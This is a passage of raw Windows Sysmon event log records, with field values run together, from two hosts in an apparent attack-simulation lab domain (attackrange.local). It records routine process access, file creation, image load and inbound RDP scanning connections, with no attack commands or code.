15:00:07.292{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.292{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.292{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC77-607E-740F-00000000BB01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.292{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC77-607E-740F-00000000BB01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.293{A7A01FEF-EC77-607E-740F-00000000BB01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000082283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:05.639{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56204-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:05.607{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60928-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050990Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:07.905{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39A718AE6FA1D8737008324E508561D3,SHA256=4639C2D97C12D823E5DD43A8832728C3CA46A5CC908F78DD17EC2760FD31E0E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050989Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:05.095{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60565-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050988Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:04.883{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59278-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050987Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:04.866{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52558-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050986Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:04.754{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56340-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:08.574{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71FF735736BB5DF5B710A8A59B97335,SHA256=7C2E252069F08F77B892D724EC861DF80D8391C4357421F6D5FBA5288F14A885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:08.433{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450157FF351C7AB1FB7BE45D90FF77C5,SHA256=1E704153CB7ECB5DB0C61F037520FFDDBE45C98F0EFB3D130323DF4D0D92EC67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050992Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:08.936{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EE97D650EC86342F568F891E61E8DAF,SHA256=B70C512AA1C0E8CCC64D6231DD50DD96CA1C875AF2AC1AC4F215FAFD9FAC5936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050991Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:08.515{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2459A725327320390090D56463821E0,SHA256=1230F658FB85F846FBCCF1F073CC2D03AA99065EE17F2ECCE1CEA6E7B0E9A079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:09.464{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F321F36F5E01C2C55A94744F30CE1EC5,SHA256=93411B9CEB15812C5A5C0446851E7BE0E31A4A997847D8DC31401F2FD95307BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050994Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:09.968{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76AAB295B8C6323F30400F4CB83B8D2C,SHA256=05995CDB2AE819176EEA107CB8F0328237091836772FDC3BF9255A01DCEC4FAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.302{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49407-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050993Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:06.571{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60753-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:10.495{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41B3F18D502648386F40480A74138C7B,SHA256=9CEA0F2C562872F6820AEC706E68315C848C99BEF56C1E63DD61226EF8B002F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:08.904{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59853-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:08.185{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57666-false10.0.1.12-8000- 23542300x800000000000000050996Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:10.311{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4107E4785AAEE82DFE4585F1848DB32,SHA256=A8075D83A08DF03E7E813E5D846132062F3ECE570F7B22F74BC2F71C0908F6FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050995Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:08.135{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62230-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.511{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D499F20202AAD75F860E3BCCB12896,SHA256=C8D134758CFB0523C7B63BA54DAC5690A25D6AB1E8318C7B31836661F81395F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.480{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=83C2EB92C1B464A133BD7513F0DD6ABD,SHA256=4E713B3DC00BAC617601A905AF4819A19FF731404235B6D5FDB8DFDA7E5CCC98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.464{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.datMD5=E428374F0558010FB6363685BF471924,SHA256=44D7EAB88079DFDA6771A6276E105C08D5250B735A52B36E6ABF43976616FDCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.449{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=83C2EB92C1B464A133BD7513F0DD6ABD,SHA256=4E713B3DC00BAC617601A905AF4819A19FF731404235B6D5FDB8DFDA7E5CCC98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.449{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1B90575F13FB149EEC7757F973F03CBA,SHA256=FE2AB1378EACE6C3E0B536E91531BF1421723CE918303D8583771C561E48573C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.433{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.433{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000082303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.433{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\System32\sppsvc.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 354300x800000000000000082302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:10.099{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-1299-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.074{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=295BC9828EEB4949314525BB7B2A0D1F,SHA256=0EFA41EA77718A6639A6B9025B1DD66CACF1C45F7D2AE67B46B6EBC6CC2CEA48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050997Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:10.999{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C434EFC2B482ED7693EEF21434AB5A,SHA256=D9B5C7A5274F808CFBBB1CA85360423720463847E0E4DDACDB717740EF62AE4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:12.558{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF262B1C795A01C54A4F0E7D4144611D,SHA256=63755C4351E033DE914B4F3121B0122086CE08FA49DD1CAB3FDA31D41D78C307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:12.495{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=099AA66755E3EFC7ED12B8D2D756543D,SHA256=0FACF2F5C750CAB0C859B857FF22C0EE2BE59BBF16940110F349DA12B92B3B22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:12.495{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5E723D8C6C78AF7572B3EC1953FCC62B,SHA256=61D7C7438D76020A58F283D3F496D31803C1069F74E35ABCC3323FB77F44B9C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:10.202{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57562-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:12.199{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA4E8B2E529D207BFC6AFB5D96A6384E,SHA256=818AE00D60A8F3089FD1AE39516364A881E093B898B8913835DF09624BE79450,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050999Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:09.729{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63702-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050998Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:11.999{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40FFB81748DE914117C0CA5CD20CB708,SHA256=83FC0FF8C0264CAC591D4005271BF5571F830F9D12CF7893FBC77DFCC01DD3F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:13.573{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5E9391A40B05D513B998CE949D6F3F,SHA256=FB614E532B3CA1ADA14A33AD2DE6A7C61D3C408556130047B0CAF50E45EEA563,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.661{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58919-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:11.588{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-2656-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:13.277{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE5C6909B30EC2A7445833A62F11C653,SHA256=FC39E38C220CA20FC61DD614F7156B6590C4FD31A235CD783E98FBD9EF1D08D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051002Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:13.890{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2AA5CF0B9510B8B67FC24E79DB0F9B67,SHA256=B9BE7E45277C88B40B52423408CE56933B988C70FBF5E15ACFDC7F5C81F2020D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051001Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:10.636{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52559-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000051000Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:13.015{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6CAF15A870815BF915938C754DACF15,SHA256=4C09CAD43543388A947DE30F47E309D864E27D6DC696E71C54DD09943A1ABE91,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:13.247{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57667-false10.0.1.12-8000- 23542300x800000000000000082320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 